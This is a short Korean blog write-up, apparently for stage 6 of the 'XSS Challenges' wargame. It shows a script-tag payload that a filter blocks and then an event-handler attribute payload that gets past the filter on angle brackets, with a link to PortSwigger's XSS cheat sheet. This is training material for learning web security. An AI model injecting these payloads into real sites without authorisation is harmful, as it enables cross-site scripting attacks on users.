[XSS Challenges] Stage #6

Stage # 6

풀이

6번

"><script>alert(document.domain)</script> 를 입력해보았다.

<>가 필터링되어 XSS가 실행 되지않는다.

<>를 사용하지 않고 XSS를 실행 시켜야 한다.

event handler를 사용하면 할 수 있다.

" onfocus =alert(document.domain); autofocus

REF

portswigger.net/web-security/cross-site-scripting/cheat-sheet

Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition | Web Security Academy

Interactive cross-site scripting (XSS) cheat sheet for 2020, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.

portswigger.net

'CTF > XSS Challenges' 카테고리의 다른 글

[XSS Challenges] Stage #8 (0)	2020.11.19
[XSS Challenges] Stage #7 (0)	2020.11.19
[XSS Challenges] Stage #5 (0)	2020.11.17
[XSS Challenges] Stage #4 (0)	2020.11.17
[XSS Challenges] Stage #3 (0)	2020.11.17

그냥 블로그

[XSS Challenges] Stage #6

Stage # 6

풀이

REF

'CTF > XSS Challenges' 카테고리의 다른 글

+ Recent posts

티스토리툴바